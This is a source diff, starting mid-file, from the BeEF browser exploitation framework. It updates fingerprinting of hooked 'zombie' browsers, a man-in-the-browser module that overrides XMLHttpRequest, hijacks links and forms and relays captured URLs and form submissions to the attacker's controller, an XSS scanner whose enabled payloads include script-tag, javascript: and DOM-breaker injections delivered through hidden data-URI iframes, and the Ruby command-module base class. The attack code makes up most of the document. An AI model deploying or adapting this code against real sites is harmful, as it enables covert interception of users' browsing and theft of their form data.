* @example: beef.browser.isC17()
*/
isC17: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==17)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17();
},
/**
@@ -355,6 +377,7 @@ beef.browser = {
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 16
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -368,6 +391,8 @@ beef.browser = {
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
@@ -408,6 +433,7 @@ beef.browser = {
if (this.isC14()) { return '14' }; // Chrome 14
if (this.isC15()) { return '15' }; // Chrome 15
if (this.isC16()) { return '16' }; // Chrome 16
if (this.isC17()) { return '17' }; // Chrome 17
if (this.isFF2()) { return '2' }; // Firefox 2
@@ -421,7 +447,8 @@ beef.browser = {
if (this.isFF8()) { return '8' }; // Firefox 8
if (this.isFF9()) { return '9' }; // Firefox 9
if (this.isFF10()) { return '10' }; // Firefox 10
if (this.isFF11()) { return '11' }; // Firefox 11
if (this.isFF12()) { return '12' }; // Firefox 12
if (this.isIE6()) { return '6' }; // Internet Explorer 6
if (this.isIE7()) { return '7' }; // Internet Explorer 7
@@ -482,7 +509,19 @@ beef.browser = {
return flash_installed;
}
},
/**
* Checks if the zombie has Java enabled.
* @return: {Boolean} true or false.
*
* @example: if(beef.browser.javaEnabled()) { ... }
*/
javaEnabled: function() {
return (!!window.navigator.javaEnabled());
},
/**
* Checks if the zombie has Java installed and enabled.
* @return: {Boolean} true or false.
@@ -490,9 +529,34 @@ beef.browser = {
* @example: if(beef.browser.hasJava()) { ... }
*/
hasJava: function() {
if(!this.type().IE && window.navigator.javaEnabled && window.navigator.javaEnabled()) {
// Check if Java is enabled
if (!beef.browser.javaEnabled()) {
return false;
}
// This is a temporary fix as this does not work on Safari and Chrome
// Chrome requires manual user intervention even with unsigned applets.
// Safari requires a few seconds to load the applet.
if (beef.browser.isC() || beef.browser.isS()) {
return true;
}
// Inject an unsigned java applet to double check if the Java
// plugin is working fine.
try {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/demos/checkJava.jar';
var applet_id = 'checkJava';
var applet_name = 'checkJava';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'checkJava' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
beef.dom.detachApplet('checkJava');
return output = 1;
} catch(e) {
return false;
}
return false;
},
@@ -564,8 +628,7 @@ beef.browser = {
'control':'ShockwaveFlash.ShockwaveFlash',
'return': function(control) {
version = control.getVariable('$version').substring(4);
version = version.split(',');
return 'Flash Player v'+parseFloat(version[0]+'.'+version[1]);
return 'Flash Player v'+version.replace(/,/g, ".");
}},
'Quicktime':{
'control': 'QuickTime.QuickTime',
@@ -665,12 +728,10 @@ beef.browser = {
var browser_plugins = beef.browser.getPlugins();
var os_name = beef.os.getName();
var system_platform = (typeof(navigator.platform) != "undefined" && navigator.platform != "") ? navigator.platform : null;
var internal_ip = beef.net.local.getLocalAddress();
var internal_hostname = beef.net.local.getLocalHostname();
var browser_type = JSON.stringify(beef.browser.type(), function (key, value) {if (value == true) return value; else if (typeof value == 'object') return value; else return;});
var screen_params = beef.browser.getScreenParams();
var window_size = beef.browser.getWindowSize();
var java_enabled = (beef.browser.hasJava())? "Yes" : "No";
var java_enabled = (beef.browser.javaEnabled())? "Yes" : "No";
var vbscript_enabled=(beef.browser.hasVBScript())? "Yes" : "No";
var has_flash = (beef.browser.hasFlash())? "Yes" : "No";
var has_googlegears=(beef.browser.hasGoogleGears())? "Yes":"No";
@@ -691,12 +752,10 @@ beef.browser = {
if(browser_plugins) details["BrowserPlugins"] = browser_plugins;
if(os_name) details['OsName'] = os_name;
if(system_platform) details['SystemPlatform'] = system_platform;
if(internal_ip) details['InternalIP'] = internal_ip;
if(internal_hostname) details['InternalHostname'] = internal_hostname;
if(browser_type) details['BrowserType'] = browser_type;
if(screen_params) details['ScreenParams'] = screen_params;
if(window_size) details['WindowSize'] = window_size;
if(java_enabled) details['JavaEnabled'] = java_enabled
if(java_enabled) details['JavaEnabled'] = java_enabled;
if(vbscript_enabled) details['VBScriptEnabled'] = vbscript_enabled
if(has_flash) details['HasFlash'] = has_flash
if(has_web_socket) details['HasWebSocket'] = has_web_socket

391
core/main/client/mitb.js
View File

@@ -1,135 +1,256 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid: null,
curl: null,
init: function(cid, curl){
beef.mitb.cid = cid;
beef.mitb.curl = curl;
},
// Initializes the hook on anchors and forms.
hook: function(){
beef.onpopstate.push(function(event) {beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);});
beef.onclose.push(function(event) {beef.mitb.endSession();});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
for(var i=0;i<anchors.length;i++){
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for(var i=0;i<forms.length;i++){
beef.mitb.poisonForm(forms[i]);
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor: function(e){
try{
e.preventDefault;
if(beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])){
var title = "";
if(document.getElementsByTagName("title").length == 0){
title = document.title;
}else{
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be: "EF" }, title, e.currentTarget);
}
}catch(e){
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm: function(form){
form.onsubmit=function(e){
var inputs = form.getElementsByTagName("input");
var query = "";
for(var i=0;i<inputs.length;i++){
if(i>0 && i<inputs.length-1) query += "&";
switch(inputs[i].type){
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be: "EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm: function(url, query, target){
try{
var y = new XMLHttpRequest();
y.open('POST', url, false);
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: "+url+" ["+query+"]");
return true;
}catch(x){
return false;
}
},
// Fetches a hooked link with AJAX
fetch: function(url, target){
try{
var y = new XMLHttpRequest();
y.open('GET', url,false);
y.onreadystatechange = function(){
if(y.readyState == 4 && y.responseText != ""){
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: "+url);
return true;
}catch(x){
window.open(url);
beef.mitb.sniff("GET [New Window]: "+url);
return false;
}
},
// Relays an entry to the framework
sniff: function(result){
try{
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
}catch(x){}
return true;
},
// Signals the Framework that the user has lost the hook
endSession: function(){
beef.mitb.sniff("Window closed.");
}
}
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.mitb = {
cid:null,
curl:null,
init:function (cid, curl) {
beef.mitb.cid = cid;
beef.mitb.curl = curl;
/*Override open method to intercept ajax request*/
var xml_type;
if (window.XMLHttpRequest && !(window.ActiveXObject)) {
xml_type = 'XMLHttpRequest';
}
if (xml_type == "XMLHttpRequest") {
beef.mitb.sniff("Method XMLHttpRequest.open override");
(function (open) {
XMLHttpRequest.prototype.open = function (method, url, async, user, pass) {
var portRegex = new RegExp(":[0-9]+");
var portR = portRegex.exec(url);
/*return :port*/
var requestPort;
if (portR != null) {
requestPort = portR[0].split(":");
}
if ((user == "beef") && (pass == "beef")) {
/*a poisoned something*/
open.call(this, method, url, async, null, null);
}
else if (url.indexOf("hook.js") != -1 || url.indexOf("/dh?") != -1) {
/*a beef hook.js polling or dh */
open.call(this, method, url, async, null, null);
}
else {
if (method == "GET") {
if (url.indexOf(document.location.hostname) == -1 || (portR != null && requestPort != document.location.port )) {
beef.mitb.sniff("GET [Ajax CrossDomain Request]: " + url);
window.open(url);
}
else {
beef.mitb.sniff("GET [Ajax Request]: " + url);
if (beef.mitb.fetch(url, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
/*write the url of the page*/
history.pushState({ Be:"EF" }, title, url);
}
}
}
else {
/*if we are here we have an ajax post req*/
beef.mitb.sniff("Post ajax request to: " + url);
open.call(this, method, url, async, user, pass);
}
}
};
})(XMLHttpRequest.prototype.open);
}
},
// Initializes the hook on anchors and forms.
hook:function () {
beef.onpopstate.push(function (event) {
beef.mitb.fetch(document.location, document.getElementsByTagName("html")[0]);
});
beef.onclose.push(function (event) {
beef.mitb.endSession();
});
var anchors = document.getElementsByTagName("a");
var forms = document.getElementsByTagName("form");
var lis = document.getElementsByTagName("li");
for (var i = 0; i < anchors.length; i++) {
anchors[i].onclick = beef.mitb.poisonAnchor;
}
for (var i = 0; i < forms.length; i++) {
beef.mitb.poisonForm(forms[i]);
}
for (var i = 0; i < lis.length; i++) {
if (lis[i].hasAttribute("onclick")) {
lis[i].removeAttribute("onclick");
/*clear*/
lis[i].setAttribute("onclick", "beef.mitb.fetchOnclick('" + lis[i].getElementsByTagName("a")[0] + "')");
/*override*/
}
}
},
// Hooks anchors and prevents them from linking away
poisonAnchor:function (e) {
try {
e.preventDefault;
if (beef.mitb.fetch(e.currentTarget, document.getElementsByTagName("html")[0])) {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
} else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, e.currentTarget);
}
} catch (e) {
console.error('beef.mitb.poisonAnchor - failed to execute: ' + e.message);
}
return false;
},
// Hooks forms and prevents them from linking away
poisonForm:function (form) {
form.onsubmit = function (e) {
var inputs = form.getElementsByTagName("input");
var query = "";
for (var i = 0; i < inputs.length; i++) {
if (i > 0 && i < inputs.length - 1) query += "&";
switch (inputs[i].type) {
case "submit":
break;
default:
query += inputs[i].name + "=" + inputs[i].value;
break;
}
}
e.preventdefault;
beef.mitb.fetchForm(form.action, query, document.getElementsByTagName("html")[0]);
history.pushState({ Be:"EF" }, "", form.action);
return false;
}
},
// Fetches a hooked form with AJAX
fetchForm:function (url, query, target) {
try {
var y = new XMLHttpRequest();
y.open('POST', url, false, "beef", "beef");
y.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(query);
beef.mitb.sniff("POST: " + url + "[" + query + "]");
return true;
} catch (x) {
return false;
}
},
// Fetches a hooked link with AJAX
fetch:function (url, target) {
try {
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
return true;
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
return false;
}
},
// Fetches a window.location=http://domainname.com and setting up history
fetchOnclick:function (url) {
try {
var target = document.getElementsByTagName("html")[0];
var y = new XMLHttpRequest();
y.open('GET', url, false, "beef", "beef");
y.onreadystatechange = function () {
if (y.readyState == 4 && y.responseText != "") {
var title = "";
if (document.getElementsByTagName("title").length == 0) {
title = document.title;
}
else {
title = document.getElementsByTagName("title")[0].innerHTML;
}
history.pushState({ Be:"EF" }, title, url);
target.innerHTML = y.responseText;
setTimeout(beef.mitb.hook, 10);
}
}
y.send(null);
beef.mitb.sniff("GET: " + url);
} catch (x) {
window.open(url);
beef.mitb.sniff("GET [New Window]: " + url);
}
},
// Relays an entry to the framework
sniff:function (result) {
try {
beef.net.send(beef.mitb.cid, beef.mitb.curl, result);
} catch (x) {
}
return true;
},
// Signals the Framework that the user has lost the hook
endSession:function () {
beef.mitb.sniff("Window closed.");
}
}

15
core/main/client/net.js
View File

@@ -168,9 +168,22 @@ beef.net = {
response.was_cross_domain = cross_domain;
var start_time = new Date().getTime();
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
dataType: dataType
});
}else{ //GET, HEAD, ...
$j.ajaxSetup({
dataType: 'script'
});
}
//build and execute the request
$j.ajax({type: method,
dataType: 'script', // this is required for bugs in IE so data can be transferred back to the server
url: url,
data: data,
timeout: (timeout * 1000),

38
core/main/client/net/local.js
View File

@@ -21,6 +21,8 @@
beef.net.local = {
sock: false,
checkJava: false,
hasJava: false,
/**
* Initializes the java socket. We have to use this method because
@@ -29,16 +31,30 @@ beef.net.local = {
* is invalid:
* sock: new java.net.Socket();
*/
initializeSocket: function() {
if(! beef.browser.hasJava()) return -1;
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
if(this.checkJava){
if(!beef.browser.hasJava()) {
this.checkJava=True;
this.hasJava=False;
return -1;
}else{
this.checkJava=True;
this.hasJava=True;
return 1;
}
}
else{
if(!this.hasJava) return -1;
else{
try {
this.sock = new java.net.Socket();
} catch(e) {
return -1;
}
return 1;
}
}
return 1;
},
/**
@@ -47,7 +63,7 @@ beef.net.local = {
* @error: return -1 if the internal ip cannot be retrieved.
*/
getLocalAddress: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -65,7 +81,7 @@ beef.net.local = {
* @error: return -1 if the hostname cannot be retrieved.
*/
getLocalHostname: function() {
if(! beef.browser.hasJava()) return false;
if(!this.hasJava) return false;
this.initializeSocket();
@@ -79,4 +95,4 @@ beef.net.local = {
};
beef.regCmp('beef.net.local');
beef.regCmp('beef.net.local');

49
core/main/client/net/xssrays.js
View File

@@ -50,19 +50,19 @@ beef.net.xssrays = {
vectors: [
// {input:"',XSS,'", name: 'Standard DOM based injection single', browser: 'ALL',url:true,form:true,path:true},
// {input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input: '\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input: '"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
{input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
{input:'",XSS,"', name: 'Standard DOM based injection double', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'><script>XSS<\/script>', name: 'Standard script injection single', browser: 'ALL',url:true,form:true,path:true},
{input:'"><script>XSS<\/script>', name: 'Standard script injection double', browser: 'ALL',url:true,form:true,path:true}, //,
// {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
// {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
// {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true}
// {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
// {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
{input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
// {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
// {input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
//{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
{input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
{input:'null,XSS//', name: 'Unfiltered DOM injection comma', browser: 'ALL',url:true,form:true,path:true},
{input:'null\nXSS//', name: 'Unfiltered DOM injection new line', browser: 'ALL',url:true,form:true,path:true}
],
uniqueID: 0,
rays: [],
@@ -308,7 +308,10 @@ beef.net.xssrays = {
var ray = this.rays[beef.net.xssrays.uniqueID];
var paramsPos = 0;
if (params != null) { // check for XSS in GET parameters
if (params != null) {
/*
* ++++++++++ check for XSS in URI parameters (GET) ++++++++++
*/
for (var i in params) {
if (params.hasOwnProperty(i)) {
@@ -328,12 +331,19 @@ beef.net.xssrays = {
exploit = vector.input.replace(/XSS/g, beefCallback);
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
if(beef.browser.isC() || beef.browser.isS()){ //we will base64 the whole uri later
url += i + '=' + exploit + '&';
}else{
url += i + '=' + (urlencode ? encodeURIComponent(exploit) : exploit) + '&';
}
paramsPos++;
}
}
} else { // check for XSS in GET URL path
} else {
/*
* ++++++++++ check for XSS in URI path (GET) ++++++++++
*/
var filename = beef.net.xssrays.fileName(url);
poc = vector.input.replace(/XSS/g, "alert(1)");
@@ -352,8 +362,9 @@ beef.net.xssrays = {
//TODO: this need to checked and the slash shouldn't be added in this particular case
url = url.replace(filename, filename + '/' + (urlencode ? encodeURIComponent(exploit) : exploit) + '/');
}
/*
* ++++++++++ create the iFrame that will contain the attack vector ++++++++++
*/
var iframe = document.createElement('iframe');
iframe.style.display = 'none';
iframe.id = 'ray' + beef.net.xssrays.uniqueID;
@@ -361,10 +372,18 @@ beef.net.xssrays = {
iframe.name = 'ray' + Math.random().toString();
if (method === 'GET') {
iframe.src = url;
if(beef.browser.isC() || beef.browser.isS()){
var datauri = btoa(url);
iframe.src = "data:text/html;base64," + datauri;
}else{
iframe.src = url;
}
document.body.appendChild(iframe);
beef.net.xssrays.printDebug("Creating XSS iFrame with src [" + iframe.src + "], id[" + iframe.id + "], time [" + iframe.time + "]");
} else if (method === 'POST') {
/*
* ++++++++++ check for XSS in body parameters (POST) ++++++++++
*/
var form = '<form action="' + beef.net.xssrays.escape(action) + '" method="post" id="frm">';
poc = '';
pocurl = action + "?";

346
core/main/command.rb
View File

@@ -15,208 +15,202 @@
#
module BeEF
module Core
module Core
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
end
# @note This module contains a list of utils functions to use when writing commands
module CommandUtils
# Format a string to support multiline in javascript.
# @param [String] text String to convert
# @return [String] Formatted string
def format_multiline(text); text.gsub(/\n/, '\n'); end
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
get_extensions
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# Uses the API to include all the code from extensions that need to add methods, constants etc to that class.
# @todo Determine if this method is deprecated
def get_extensions
BeEF::API::Command.extended_in_modules.each do |mod|
self.class.send(:include, mod)
# @note The Command Module Context is being used when evaluating code in eruby.
# In other words, we use that code to add funky functions to the
# javascript templates of our commands.
class CommandContext < Erubis::Context
include BeEF::Core::CommandUtils
# Constructor
# @param [Hash] hash
def initialize(hash=nil);
super(hash);
end
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
# @note This class is the base class for all command modules in the framework.
# Two instances of this object are created during the execution of command module.
class Command
attr_reader :datastore, :path, :default_command_url, :beefjs_components, :friendlyname
attr_accessor :zombie, :command_id, :session_id
include BeEF::Core::CommandUtils
include BeEF::Core::Constants::Browsers
include BeEF::Core::Constants::CommandModule
# Super class controller
# @param [String] key command module key
def initialize(key)
config = BeEF::Core::Configuration.instance
@key = key
@datastore = {}
@friendlyname = config.get("beef.module.#{key}.name")
@output = ''
@path = config.get("beef.module.#{key}.path")
@default_command_url = config.get("beef.module.#{key}.mount")
@id = config.get("beef.module.#{key}.db.id")
@auto_update_zombie = false
@results = {}
@beefjs_components = {}
end
# This function is called just before the instructions are sent to hooked browser.
def pre_send; end
# Callback method. This function is called when the hooked browser sends results back.
def callback; end
# If the command requires some data to be sent back, this function will process them.
# @param [] head
# @param [Hash] params Hash of parameters
# @todo Determine argument "head" type
def process_zombie_response(head, params); end
# Returns true if the command needs configurations to work. False if not.
# @deprecated This command should not be used since the implementation of the new configuration system
def needs_configuration?; !@datastore.nil?; end
# Returns information about the command in a JSON format.
# @return [String] JSON formatted string
def to_json
{
'Name' => @friendlyname,
'Description' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.description"),
'Category' => BeEF::Core::Configuration.instance.get("beef.module.#{@key}.category"),
'Data' => BeEF::Module.get_options(@key)
}.to_json
end
# Builds the 'datastore' attribute of the command which is used to generate javascript code.
# @param [Hash] data Data to be inserted into the datastore
# @todo Confirm argument "data" type
def build_datastore(data);
@datastore = JSON.parse(data)
end
# Sets the datastore for the callback function. This function is meant to be called by the CommandHandler
# @param [Hash] http_params HTTP parameters
# @param [Hash] http_headers HTTP headers
def build_callback_datastore(http_params, http_headers, result, command_id, beefhook)
@datastore = {'http_headers' => {}} # init the datastore
# get, check and add the http_params to the datastore
http_params.keys.each { |http_params_key|
(print_error 'http_params_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_params_key)
http_params_value = Erubis::XmlHelper.escape_xml(http_params[http_params_key])
(print_error 'http_params_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_params_value)
@datastore[http_params_key] = http_params_value # add the checked key and value to the datastore
}
# get, check and add the http_headers to the datastore
http_headers.keys.each { |http_header_key|
(print_error 'http_header_key is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_key?(http_header_key)
http_header_value = Erubis::XmlHelper.escape_xml(http_headers[http_header_key][0])
(print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
@datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
}
@datastore['results'] = result
@datastore['cid'] = command_id
@datastore['beefhook'] = beefhook
end
# Returns the output of the command. These are the actual instructions sent to the browser.
# @return [String] The command output
def output
f = @path+'command.js'
(print_error "#{f} file does not exist";return) if not File.exists? f
command = BeEF::Core::Models::Command.first(:id => @command_id)
@eruby = Erubis::FastEruby.new(File.read(f))
@eruby = Erubis::FastEruby.new(File.read(f))
data = BeEF::Core::Configuration.instance.get("beef.module.#{@key}")
cc = BeEF::Core::CommandContext.new
cc['command_url'] = @default_command_url
cc['command_id'] = @command_id
JSON.parse(command['data']).each{|v|
cc[v['name']] = v['value']
cc[v['name']] = v['value']
}
if self.respond_to?(:execute)
self.execute
self.execute
end
@output = @eruby.evaluate(cc)
@output
end
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
@output
end
# @todo Document
def oc_value(name)
# Saves the results received from the hooked browser
# @param [Hash] results Results from hooked browser
def save(results)
@results = results
end
# If nothing else than the file is specified, the function will map the file to a random path without any extension.
# @param [String] file File to be mounted
# @param [String] path URL path to mounted file
# @param [String] extension URL extension
# @param [Integer] count The amount of times this file can be accessed before being automatically unmounted
# @deprecated This function is possibly deprecated in place of the API
def map_file_to_url(file, path=nil, extension=nil, count=1)
return BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind(file, path, extension, count)
end
# Tells the framework to load a specific module of the BeEFJS library that the command will be using.
# @param [String] component String of BeEFJS component to load
# @note Example: use 'beef.net.local'
def use(component)
return if @beefjs_components.include? component
component_path = '/'+component
component_path.gsub!(/beef./, '')
component_path.gsub!(/\./, '/')
component_path.replace "#{$root_dir}/core/main/client/#{component_path}.js"
raise "Invalid beefjs component for command module #{@path}" if not File.exists?(component_path)
@beefjs_components[component] = component_path
end
# @todo Document
def oc_value(name)
option = BeEF::Core::Models::OptionCache.first(:name => name)
return nil if not option
return option.value
end
return nil if not option
return option.value
end
# @todo Document
def apply_defaults()
@datastore.each { |opt|
opt["value"] = oc_value(opt["name"]) || opt["value"]
}
end
private
@use_template
@eruby
@update_zombie
@results
end
